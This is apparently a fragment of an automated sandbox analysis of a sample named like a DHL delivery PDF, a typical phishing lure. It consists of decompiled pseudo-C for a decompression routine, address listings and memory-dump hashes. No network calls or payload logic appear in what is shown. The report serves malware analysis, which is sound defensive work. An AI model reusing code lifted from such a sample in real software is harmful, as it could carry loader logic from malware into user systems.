                                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__esi = __edx + __eax;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__ax =  *__esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													__cx = __ax >> 5;
                                                            													__eax = __eax - __ecx;
                                                            													__edx = __edx + 1;
                                                            													__eflags = __edx;
                                                            													 *__esi = __ax;
                                                            													 *(__ebp - 0x50) = __edx;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L148;
                                                            												} else {
                                                            													goto L146;
                                                            												}
                                                            											case 0x19:
                                                            												__eflags = __ebx - 4;
                                                            												if(__ebx < 4) {
                                                            													 *(__ebp - 0x2c) = __ebx;
                                                            													L119:
                                                            													_t393 = __ebp - 0x2c;
                                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            													__eflags =  *_t393;
                                                            													L120:
                                                            													__eax =  *(__ebp - 0x2c);
                                                            													__eflags = __eax;
                                                            													if(__eax == 0) {
                                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            														goto L170;
                                                            													}
                                                            													__eflags = __eax -  *(__ebp - 0x60);
                                                            													if(__eax >  *(__ebp - 0x60)) {
                                                            														goto L171;
                                                            													}
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            													__eax =  *(__ebp - 0x30);
                                                            													_t400 = __ebp - 0x60;
                                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            													__eflags =  *_t400;
                                                            													goto L123;
                                                            												}
                                                            												__ecx = __ebx;
                                                            												__eax = __ebx;
                                                            												__ecx = __ebx >> 1;
                                                            												__eax = __ebx & 0x00000001;
                                                            												__ecx = (__ebx >> 1) - 1;
                                                            												__al = __al | 0x00000002;
                                                            												__eax = (__ebx & 0x00000001) << __cl;
                                                            												__eflags = __ebx - 0xe;
                                                            												 *(__ebp - 0x2c) = __eax;
                                                            												if(__ebx >= 0xe) {
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x48) = __ecx;
                                                            													L102:
                                                            													__eflags =  *(__ebp - 0x48);
                                                            													if( *(__ebp - 0x48) <= 0) {
                                                            														__eax = __eax + __ebx;
                                                            														 *(__ebp - 0x40) = 4;
                                                            														 *(__ebp - 0x2c) = __eax;
                                                            														__eax =  *(__ebp - 4);
                                                            														__eax =  *(__ebp - 4) + 0x644;
                                                            														__eflags = __eax;
                                                            														L108:
                                                            														__ebx = 0;
                                                            														 *(__ebp - 0x58) = __eax;
                                                            														 *(__ebp - 0x50) = 1;
                                                            														 *(__ebp - 0x44) = 0;
                                                            														 *(__ebp - 0x48) = 0;
                                                            														L112:
                                                            														__eax =  *(__ebp - 0x40);
                                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            															_t391 = __ebp - 0x2c;
                                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            															__eflags =  *_t391;
                                                            															goto L119;
                                                            														}
                                                            														__eax =  *(__ebp - 0x50);
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            														__eax =  *(__ebp - 0x58);
                                                            														__esi = __edi + __eax;
                                                            														 *(__ebp - 0x54) = __esi;
                                                            														__ax =  *__esi;
                                                            														__ecx = __ax & 0x0000ffff;
                                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                                            														if( *(__ebp - 0xc) >= __edx) {
                                                            															__ecx = 0;
                                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            															__ecx = 1;
                                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            															__ebx = 1;
                                                            															__ecx =  *(__ebp - 0x48);
                                                            															__ebx = 1 << __cl;
                                                            															__ecx = 1 << __cl;
                                                            															__ebx =  *(__ebp - 0x44);
                                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                                            															__cx = __ax;
                                                            															__cx = __ax >> 5;
                                                            															__eax = __eax - __ecx;
                                                            															__edi = __edi + 1;
                                                            															__eflags = __edi;
                                                            															 *(__ebp - 0x44) = __ebx;
                                                            															 *__esi = __ax;
                                                            															 *(__ebp - 0x50) = __edi;
                                                            														} else {
                                                            															 *(__ebp - 0x10) = __edx;
                                                            															0x800 = 0x800 - __ecx;
                                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            															 *__esi = __dx;
                                                            														}
                                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                                            															L111:
                                                            															_t368 = __ebp - 0x48;
                                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                                            															__eflags =  *_t368;
                                                            															goto L112;
                                                            														} else {
                                                            															goto L109;
                                                            														}
                                                            													}
                                                            													__ecx =  *(__ebp - 0xc);
                                                            													__ebx = __ebx + __ebx;
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            														__ecx =  *(__ebp - 0x10);
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            														__ebx = __ebx | 0x00000001;
                                                            														__eflags = __ebx;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L101:
                                                            														_t338 = __ebp - 0x48;
                                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                                            														__eflags =  *_t338;
                                                            														goto L102;
                                                            													} else {
                                                            														goto L99;
                                                            													}
                                                            												}
                                                            												__edx =  *(__ebp - 4);
                                                            												__eax = __eax - __ebx;
                                                            												 *(__ebp - 0x40) = __ecx;
                                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            												goto L108;
                                                            											case 0x1a:
                                                            												L56:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													 *(__ebp - 0x88) = 0x1a;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x68);
                                                            												__al =  *(__ebp - 0x5c);
                                                            												__edx =  *(__ebp - 8);
                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *( *(__ebp - 0x68)) = __al;
                                                            												__ecx =  *(__ebp - 0x14);
                                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                                            												__eax = __ecx + 1;
                                                            												__edx = 0;
                                                            												_t192 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t192;
                                                            												goto L79;
                                                            											case 0x1b:
                                                            												L75:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													 *(__ebp - 0x88) = 0x1b;
                                                            													goto L170;
                                                            												}
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t274 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t274;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												_t283 = __ebp - 0x64;
                                                            												 *_t283 =  *(__ebp - 0x64) - 1;
                                                            												__eflags =  *_t283;
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												L79:
                                                            												 *(__ebp - 0x14) = __edx;
                                                            												goto L80;
                                                            											case 0x1c:
                                                            												while(1) {
                                                            													L123:
                                                            													__eflags =  *(__ebp - 0x64);
                                                            													if( *(__ebp - 0x64) == 0) {
                                                            														break;
                                                            													}
                                                            													__eax =  *(__ebp - 0x14);
                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                            														__eflags = __eax;
                                                            													}
                                                            													__edx =  *(__ebp - 8);
                                                            													__cl =  *(__eax + __edx);
                                                            													__eax =  *(__ebp - 0x14);
                                                            													 *(__ebp - 0x5c) = __cl;
                                                            													 *(__eax + __edx) = __cl;
                                                            													__eax = __eax + 1;
                                                            													__edx = 0;
                                                            													_t414 = __eax %  *(__ebp - 0x74);
                                                            													__eax = __eax /  *(__ebp - 0x74);
                                                            													__edx = _t414;
                                                            													__eax =  *(__ebp - 0x68);
                                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            													__eflags =  *(__ebp - 0x30);
                                                            													 *( *(__ebp - 0x68)) = __cl;
                                                            													 *(__ebp - 0x14) = _t414;
                                                            													if( *(__ebp - 0x30) > 0) {
                                                            														continue;
                                                            													} else {
                                                            														L80:
                                                            														 *(__ebp - 0x88) = 2;
                                                            														goto L1;
                                                            													}
                                                            												}
                                                            												 *(__ebp - 0x88) = 0x1c;
                                                            												goto L170;
                                                            										}
                                                            									}
                                                            									L171:
                                                            									_t544 = _t543 | 0xffffffff;
                                                            									goto L172;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					goto L1;
                                                            				}
                                                            			}














                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c88
                                                            0x00406c8b
                                                            0x00406c8c
                                                            0x00406c8c
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c62
                                                            0x00406c67
                                                            0x00406c67
                                                            0x00406c70
                                                            0x00406c78
                                                            0x00406c7b
                                                            0x00000000
                                                            0x00406c81
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c9e
                                                            0x00406c9e
                                                            0x00406ca2
                                                            0x0040754e
                                                            0x00000000
                                                            0x0040754e
                                                            0x00406cab
                                                            0x00406cbb
                                                            0x00406cbe
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc4
                                                            0x00406cc8
                                                            0x00000000
                                                            0x00000000
                                                            0x00406cca
                                                            0x00406cd0
                                                            0x00406cfa
                                                            0x00406d00
                                                            0x00406d07
                                                            0x00000000
                                                            0x00406d07
                                                            0x00406cd6
                                                            0x00406cd9
                                                            0x00406cde
                                                            0x00406cde
                                                            0x00406ce9
                                                            0x00406cf1
                                                            0x00406cf4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d39
                                                            0x00406d3f
                                                            0x00406d42
                                                            0x00406d4f
                                                            0x00406d57
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d0e
                                                            0x00406d0e
                                                            0x00406d12
                                                            0x0040755d
                                                            0x00000000
                                                            0x0040755d
                                                            0x00406d1e
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d2c
                                                            0x00406d2f
                                                            0x00406d32
                                                            0x00406d37
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004073ce
                                                            0x004073ce
                                                            0x004073d4
                                                            0x004073da
                                                            0x004073e0
                                                            0x004073fa
                                                            0x004073fd
                                                            0x00407403
                                                            0x0040740e
                                                            0x00407410
                                                            0x004073e2
                                                            0x004073e2
                                                            0x004073f1
                                                            0x004073f5
                                                            0x004073f5
                                                            0x0040741a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d5f
                                                            0x00406d61
                                                            0x00406d64
                                                            0x00406dd5
                                                            0x00406dd8
                                                            0x00406ddb
                                                            0x00406de2
                                                            0x00406dec
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x00406d66
                                                            0x00406d6a
                                                            0x00406d6d
                                                            0x00406d6f
                                                            0x00406d72
                                                            0x00406d75
                                                            0x00406d77
                                                            0x00406d7a
                                                            0x00406d7c
                                                            0x00406d81
                                                            0x00406d84
                                                            0x00406d87
                                                            0x00406d8b
                                                            0x00406d92
                                                            0x00406d95
                                                            0x00406d9c
                                                            0x00406da0
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406dac
                                                            0x00406daf
                                                            0x00406dcd
                                                            0x00406dcf
                                                            0x00000000
                                                            0x00406db1
                                                            0x00406db1
                                                            0x00406db4
                                                            0x00406db7
                                                            0x00406dba
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbf
                                                            0x00406dc2
                                                            0x00406dc4
                                                            0x00406dc5
                                                            0x00406dc8
                                                            0x00000000
                                                            0x00406dc8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407068
                                                            0x0040706c
                                                            0x0040708f
                                                            0x00407092
                                                            0x00407095
                                                            0x0040709f
                                                            0x0040706e
                                                            0x0040706e
                                                            0x00407071
                                                            0x00407074
                                                            0x00407077
                                                            0x00407084
                                                            0x00407087
                                                            0x00407087
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x00000000
                                                            0x004070ab
                                                            0x004070af
                                                            0x00000000
                                                            0x00000000
                                                            0x004070b5
                                                            0x004070b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004070bf
                                                            0x004070c1
                                                            0x004070c5
                                                            0x004070c5
                                                            0x004070c8
                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040711c
                                                            0x00407120
                                                            0x00407127
                                                            0x0040712a
                                                            0x0040712d
                                                            0x00407137
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00407122
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x0040715d
                                                            0x0040715d
                                                            0x00407160
                                                            0x00407163
                                                            0x00407166
                                                            0x00407166
                                                            0x00407169
                                                            0x00407170
                                                            0x00407175
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00406df8
                                                            0x00406df8
                                                            0x00406dfc
                                                            0x00407569
                                                            0x00000000
                                                            0x00407569
                                                            0x00406e02
                                                            0x00406e05
                                                            0x00406e08
                                                            0x00406e0c
                                                            0x00406e0f
                                                            0x00406e15
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e1a
                                                            0x00406e1d
                                                            0x00406e1d
                                                            0x00406e20
                                                            0x00406e23
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e29
                                                            0x00406e2f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e35
                                                            0x00406e35
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e42
                                                            0x00406e45
                                                            0x00406e46
                                                            0x00406e49
                                                            0x00406e4b
                                                            0x00406e51
                                                            0x00406e54
                                                            0x00406e57
                                                            0x00406e5a
                                                            0x00406e5d
                                                            0x00406e60
                                                            0x00406e63
                                                            0x00406e7f
                                                            0x00406e82
                                                            0x00406e85
                                                            0x00406e88
                                                            0x00406e8f
                                                            0x00406e93
                                                            0x00406e95
                                                            0x00406e99
                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406e9c
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eb1
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x00406ec5
                                                            0x00406ec8
                                                            0x00406ece
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed3
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406edc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ede
                                                            0x00406ee1
                                                            0x00406ee4
                                                            0x00406ee7
                                                            0x00406eea
                                                            0x00406eed
                                                            0x00406ef0
                                                            0x00406ef3
                                                            0x00406ef6
                                                            0x00406ef9
                                                            0x00406efc
                                                            0x00406f14
                                                            0x00406f17
                                                            0x00406f1a
                                                            0x00406f1d
                                                            0x00406f1d
                                                            0x00406f20
                                                            0x00406f24
                                                            0x00406f26
                                                            0x00406efe
                                                            0x00406efe
                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f29
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00000000
                                                            0x00406f35
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f75
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f82

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                            • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                            • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                            • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E0040711C() {
                                                            				unsigned short _t531;
                                                            				signed int _t532;
                                                            				void _t533;
                                                            				signed int _t534;
                                                            				signed int _t535;
                                                            				signed int _t565;
                                                            				signed int _t568;
                                                            				signed int _t589;
                                                            				signed int* _t606;
                                                            				void* _t613;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t613 - 0x40) != 0) {
                                                            						 *(_t613 - 0x84) = 0xb;
                                                            						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                            						goto L132;
                                                            					} else {
                                                            						__eax =  *(__ebp - 0x28);
                                                            						L88:
                                                            						 *(__ebp - 0x2c) = __eax;
                                                            						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            						L89:
                                                            						__eax =  *(__ebp - 4);
                                                            						 *(__ebp - 0x80) = 0x15;
                                                            						__eax =  *(__ebp - 4) + 0xa68;
                                                            						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            						L69:
                                                            						 *(__ebp - 0x84) = 0x12;
                                                            						while(1) {
                                                            							L132:
                                                            							 *(_t613 - 0x54) = _t606;
                                                            							while(1) {
                                                            								L133:
                                                            								_t531 =  *_t606;
                                                            								_t589 = _t531 & 0x0000ffff;
                                                            								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            								if( *(_t613 - 0xc) >= _t565) {
                                                            									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                            									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            									 *(_t613 - 0x40) = 1;
                                                            									_t532 = _t531 - (_t531 >> 5);
                                                            									 *_t606 = _t532;
                                                            								} else {
                                                            									 *(_t613 - 0x10) = _t565;
                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                            								}
                                                            								if( *(_t613 - 0x10) >= 0x1000000) {
                                                            									goto L139;
                                                            								}
                                                            								L137:
                                                            								if( *(_t613 - 0x6c) == 0) {
                                                            									 *(_t613 - 0x88) = 5;
                                                            									L170:
                                                            									_t568 = 0x22;
                                                            									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                            									_t535 = 0;
                                                            									L172:
                                                            									return _t535;
                                                            								}
                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                            								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            								L139:
                                                            								_t533 =  *(_t613 - 0x84);
                                                            								while(1) {
                                                            									 *(_t613 - 0x88) = _t533;
                                                            									while(1) {
                                                            										L1:
                                                            										_t534 =  *(_t613 - 0x88);
                                                            										if(_t534 > 0x1c) {
                                                            											break;
                                                            										}
                                                            										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                            											case 0:
                                                            												if( *(_t613 - 0x6c) == 0) {
                                                            													goto L170;
                                                            												}
                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            												_t534 =  *( *(_t613 - 0x70));
                                                            												if(_t534 > 0xe1) {
                                                            													goto L171;
                                                            												}
                                                            												_t538 = _t534 & 0x000000ff;
                                                            												_push(0x2d);
                                                            												asm("cdq");
                                                            												_pop(_t570);
                                                            												_push(9);
                                                            												_pop(_t571);
                                                            												_t609 = _t538 / _t570;
                                                            												_t540 = _t538 % _t570 & 0x000000ff;
                                                            												asm("cdq");
                                                            												_t604 = _t540 % _t571 & 0x000000ff;
                                                            												 *(_t613 - 0x3c) = _t604;
                                                            												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                            												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                            												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                            												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                            													L10:
                                                            													if(_t612 == 0) {
                                                            														L12:
                                                            														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                            														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            														goto L15;
                                                            													} else {
                                                            														goto L11;
                                                            													}
                                                            													do {
                                                            														L11:
                                                            														_t612 = _t612 - 1;
                                                            														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                            													} while (_t612 != 0);
                                                            													goto L12;
                                                            												}
                                                            												if( *(_t613 - 4) != 0) {
                                                            													GlobalFree( *(_t613 - 4));
                                                            												}
                                                            												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                            												 *(_t613 - 4) = _t534;
                                                            												if(_t534 == 0) {
                                                            													goto L171;
                                                            												} else {
                                                            													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                            													goto L10;
                                                            												}
                                                            											case 1:
                                                            												L13:
                                                            												__eflags =  *(_t613 - 0x6c);
                                                            												if( *(_t613 - 0x6c) == 0) {
                                                            													 *(_t613 - 0x88) = 1;
                                                            													goto L170;
                                                            												}
                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            												_t45 = _t613 - 0x48;
                                                            												 *_t45 =  *(_t613 - 0x48) + 1;
                                                            												__eflags =  *_t45;
                                                            												L15:
                                                            												if( *(_t613 - 0x48) < 4) {
                                                            													goto L13;
                                                            												}
                                                            												_t546 =  *(_t613 - 0x40);
                                                            												if(_t546 ==  *(_t613 - 0x74)) {
                                                            													L20:
                                                            													 *(_t613 - 0x48) = 5;
                                                            													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                            													goto L23;
                                                            												}
                                                            												 *(_t613 - 0x74) = _t546;
                                                            												if( *(_t613 - 8) != 0) {
                                                            													GlobalFree( *(_t613 - 8));
                                                            												}
                                                            												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                            												 *(_t613 - 8) = _t534;
                                                            												if(_t534 == 0) {
                                                            													goto L171;
                                                            												} else {
                                                            													goto L20;
                                                            												}
                                                            											case 2:
                                                            												L24:
                                                            												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                            												 *(_t613 - 0x84) = 6;
                                                            												 *(_t613 - 0x4c) = _t553;
                                                            												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                            												L132:
                                                            												 *(_t613 - 0x54) = _t606;
                                                            												goto L133;
                                                            											case 3:
                                                            												L21:
                                                            												__eflags =  *(_t613 - 0x6c);
                                                            												if( *(_t613 - 0x6c) == 0) {
                                                            													 *(_t613 - 0x88) = 3;
                                                            													goto L170;
                                                            												}
                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            												_t67 = _t613 - 0x70;
                                                            												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                            												__eflags =  *_t67;
                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            												L23:
                                                            												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                            												if( *(_t613 - 0x48) != 0) {
                                                            													goto L21;
                                                            												}
                                                            												goto L24;
                                                            											case 4:
                                                            												L133:
                                                            												_t531 =  *_t606;
                                                            												_t589 = _t531 & 0x0000ffff;
                                                            												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            												if( *(_t613 - 0xc) >= _t565) {
                                                            													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
